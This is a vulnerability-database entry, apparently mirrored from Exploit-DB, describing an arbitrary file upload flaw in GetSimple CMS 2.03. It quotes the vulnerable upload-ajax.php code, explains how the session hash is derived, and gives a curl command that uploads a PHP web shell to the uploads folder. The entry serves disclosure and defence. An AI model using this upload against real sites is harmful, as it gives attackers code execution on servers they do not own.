header-logo
Suggest Exploit
vendor:
GetSimple CMS
by:
Unknown
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: GetSimple CMS
Affected Version From: 02.03
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:getsimple_cms:getsimple_cms:2.03
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Arbitrary File Upload in GetSimple CMS

The GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of GetSimple CMS and implement proper input validation and sanitization.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46427/info

GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

GetSimple CMS 2.03 is vulnerable; other versions may also be affected. 

Bug Code:
getsimple/admin/upload-ajax.php

if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(‘//’,'/’,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------

Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]

curl -F “Filedata=@yourshell.txt;filename=shell.php” 
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

After, enjoy your Bacon-Shell here ...http://getsimple_localhost/ 
data/uploads/shell.php